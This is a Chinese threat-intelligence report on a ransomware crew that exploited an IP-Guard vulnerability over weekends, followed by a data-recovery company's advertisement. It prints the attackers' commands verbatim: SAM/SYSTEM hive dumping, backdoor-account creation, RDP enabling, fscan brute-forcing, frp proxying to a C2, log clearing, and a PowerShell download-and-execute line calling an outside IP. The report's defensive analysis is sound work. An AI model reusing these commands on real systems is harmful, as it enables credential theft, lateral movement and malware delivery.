一、概述

    奇安信威胁情报中心观察到一伙较为勤奋的勒索运营商，工作时间主要在周末，可以在物理上绕过安全人员对告警的发现。周六的时候使用一些Nday漏洞进行入侵，全天无休的进行内网信息收集，控制机器数量评估，并在周日晚上控制木马批量投递勒索软件，为了给第二天要上班的受害者一个“惊喜”，攻击者在横向移动所使用的工具主要有Cobalt Strike、fscan、frp、勒索投递包等，攻击手法与护网期间的国内红队有着很高的相似性。
文章最后我们就自己的数据视野来分析IP-Guard漏洞相关活动的整个时间线，揭露了当前高强度的攻防对抗状态。

二、典型渗透攻击过程回顾

    攻击者使用IP-Guard漏洞上传webshell后开始收集本机信息，使用webshell执行如下命令:

命令
net user 
tasklist 
dir
save hklm\system system.zip 
save hklm\SAM 
net1 user audit Aa123456 /add 
REG ADD  "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v  fDenyTSConnections /t REG_D
WORD /d 00000000 /f

    攻击者第一步收集本机信息、获取账户密码hash、添加用户并尝试RDP远程登录。接着在%UserProfile%目录下投递名为b.exe的Cobalt Strike木马，启动后将shellcode注入到lsass.exe进程中，C2：38.46.8.218:55324，使用CS在相同目录下投递如下文件，攻击者在投递这些工具时被天擎报毒查杀，由于周末无人观察告警信息导致攻击者很快更换了一批免杀的工具继续“工作”。基本的活动操作如下：

释放的文件         功能
fscan64.exe      扫描器
adduser.exe      添加用户
f.exe             Frp

    启动fscan开始对同一C段的服务器进行爆破，所用密码为抓取的服务器明文密码和ntml hash，爆破类型涉及RDP、SSH、SMB、MSSQL等。

命令
fscan64.exe -silent -h 10.XX.X.X/16  -pa 3389 -o 16.txt -pwda XXXX
fscan64.exe -silent -h 10.XX.X.X/24  -m ssh -no -pwda XXXX
fscan64.exe -h 10.XX.X.X/24 -m mssql  -pwd XXXXX -o mssql.txt -silent
fscan64 -h 10.XX.X.X/24 -m smb2  -hash XXXX7119 -username administrator

    启动frp开启反向代理。

命令
f.exe -t 38.46.8.218 -p 7000

    最后清除系统的ps日志。

命令
wevtutil cl "Windows  PowerShell"

    攻击者经过爆破发现已经掌握的明文密码和hash已经可以登录同C段的十几台机器，最终在周日晚上选择使用Cobalt Strike批量下发勒索投递包windows_encryptor_471820908140_self_contained.exe，内容为SFX自解压文件执行后会在%UserProfile%目录下释放名为systime.exe的LIVE家族勒索加密程序。
    使用的Cobalt Strike的IP反查挂有域名（yangaoqing.com），攻击者在入侵前疑似更换了解析的IP。

解析时间                     对应ip
2023-01-17~2023-10-09     39.97.108.148（北京阿里云）
2023-10-09~2024-01-18     38.46.8.218（美国）

三、IP-Guard漏洞的隐密时间线

    在奇安信威胁情报的数据视野中最早于2023年9月份就已经看到了IP-Guard的漏洞大规模的测试，多个重要政企受到了入侵，攻击者只执行了whoami命令，当时的研判结论是安全研究员发现了一个0day并进行测试，接着在11月08号友商通过漏洞奖励计划发布该漏洞通报后（未提供POC），11月9日我们就观察到有黑产在使用IP-Guard漏洞进行批量Web攻击，对应命令行如下：

命令
powershell -executionpolicybypass  -noprofile -windowstylehidden (new-object  
system.net.webclient).downloadfile
('http：//154.12.57.238:7845/svdcx.exe','svdcx.exe');start-process  svdcx.exe"

    这波攻击者投递的是ghost、灰鸽子等类型的国产木马，并不适合横向移动，所以这波攻击并没有造成直接的破坏性危害，攻击持续到11月末，接着友商电信安全发布Mallox勒索报告[1]，文中提到勒索团伙利用IP-Guard漏洞的时间在12月1号。

    上述现象并不是个例，威胁情报中心观察到有多个Web漏洞在安全通告发布后马上就能检测到相应的在野攻击，间隔这么短无非只有两种可能：1、黑产自己通过分析补丁很快找到漏洞所在并加以利用；2、安全研究员通过赏金计划上报当时未公开所知的漏洞，然后立即又卖给了黑产，这种可能性也无法排除。

四、总结

    目前，基于奇安信威胁情报中心的威胁情报数据的全线产品，包括奇安信威胁情报平台（TIP）、天擎、天眼高级威胁检测系统、奇安信NGSOC、奇安信态势感知等，都已经支持对此类攻击的精确检测。

IOC

38.46.8.218:7000
38.46.8.218:55324
yangaoqing.com

参考链接

https://mp.weixin.qq.com/s/0b08HNOWW61DKGA0xwLxSw

五、安全建议

（一）风险消减措施

资产梳理排查目标：根据实际情况，对内外网资产进行分时期排查

服务方式：调研访谈、现场勘查、工具扫描

服务关键内容：流量威胁监测系统排查、互联网暴露面扫描服务、技术加固服务、集权系统排查

（二）安全设备调优

    目标:
    通过对安全现状的梳理和分析，识别安全策略上的不足，结合目标防御、权限最小化、缩小攻击面等一系列参考原则，对设备的相关配置策略进行改进调优，一方面，减低无效或低效规则的出现频次；另一方面，对缺失或遗漏的规则进行补充，实现将安全设备防护能力最优化。

主要目标设备

网络安全防护设备、系统防护软件、日志审计与分析设备、安全监测与入侵识别设备。

（三） 全员安全意识增强调优

    目标:
    通过网络安全意识宣贯、培训提升全方位安全能力
    形式:
    培训及宣贯

线下培训课表
若无法组织线下的集体培训，可考虑以下两种方式:
1.提供相关的安全意识培训材料，由上而下分发学习；
2.组织相关人员线上开会学习。线上培训模式。

线上学习平台

六、团队介绍

    团队坚持自主研发及创新，在攻防演练平台、网络安全竞赛平台、网络安全学习平台方面加大研发投入，目前已获得十几项专利及知识产权。团队也先后通过了ISO9001质量管理体系、ISO14000环境管理体系、ISO45001职业安全健康管理体系 、ITSS（信息技术服务运行维护标准四级）等认证，已构建了网络安全行业合格的资质体系；与各大厂有着深度合作，并持有360政企安全认证经销商、深信服授权认证培训中心等认证。

七、我们的数据恢复服务流程

多年的数据恢复处理经验，在不断对客户服务优化的过程中搭建了"免费售前+安心保障+专业恢复+安全防御"一体化的专业服务流程。

① 免费咨询/数据诊断分析

专业的售前技术顾问服务，免费在线咨询，可第一时间获取数据中毒后的正确处理措施，防范勒索病毒在内网进一步扩散或二次执行，避免错误操作导致数据无法恢复。
 

 售前技术顾问沟通了解客户的机器中毒相关信息，结合公司数据恢复案例库的相同案例进行分析评估，初步诊断分析中毒数据的加密/损坏情况。

② 评估报价/数据恢复方案

您获取售前顾问的初步诊断评估信息后，若同意进行进一步深入的数据恢复诊断，我们将立即安排专业病毒分析工程师及数据恢复工程师进行病毒逆向分析及数据恢复检测分析。
   
专业数据恢复工程师根据数据检测分析结果，定制数据恢复方案（恢复价格/恢复率/恢复工期），并为您解答数据恢复方案的相关疑问。

③ 确认下单/签订合同

您清楚了解数据恢复方案后，您可自主选择以下两种下单方式：

（一）双方签署对公合同：根据中毒数据分析情况，量身定制输出数据恢复合同，合同内明确客户的数据恢复内容、数据恢复率、恢复工期及双方权责条款，双方合同签订，正式进入数据恢复专业施工阶段，数据恢复后进行验证确认，数据验证无误，交易完成。
（二）淘宝店铺担保交易下单：进入我司淘宝店铺专属链接下单，下单后旺旺告知客户数据恢复约定条款并确认，正式进入数据恢复专业施工阶段，数据恢复后客户进行验证，数据验证无误，确认收货，交付数据，交易完成。

④ 开始数据恢复专业施工

安排专业数据恢复工程师团队全程服务，告知客户数据恢复过程注意事项及相关方案措施，并可根据客户需求及数据情况，可选择上门恢复/远程恢复。
数据恢复过程中，团队随时向您报告数据恢复每一个节点工作进展（数据扫描 → 数据检测 → 数据确认 → 恢复工具定制 → 执行数据恢复 → 数据完整性确认）

⑤ 数据验收/安全防御方案

完成数据恢复后，我司将安排数据分析工程师进行二次检查确认数据恢复完整性，充分保障客户的数据恢复权益，二次检测确认后，通知客户进行数据验证。

客户对数据进行数据验证完成后，我司将指导后续相关注意事项及安全防范措施，并可提供专业的企业安全防范建设方案及安全顾问服务，抵御勒索病毒再次入侵。

    我们在此郑重承诺：

不成功不收费

全程一对一服务

365天不间断服务

免费提供安全方案

    24h服务热线：

18894665383

17864099776

18299173318

八、文章来源

奇安信威胁情报中心： https://mp.weixin.qq.com/s/XV0x10YV-Wrs1ZI6tNHjLA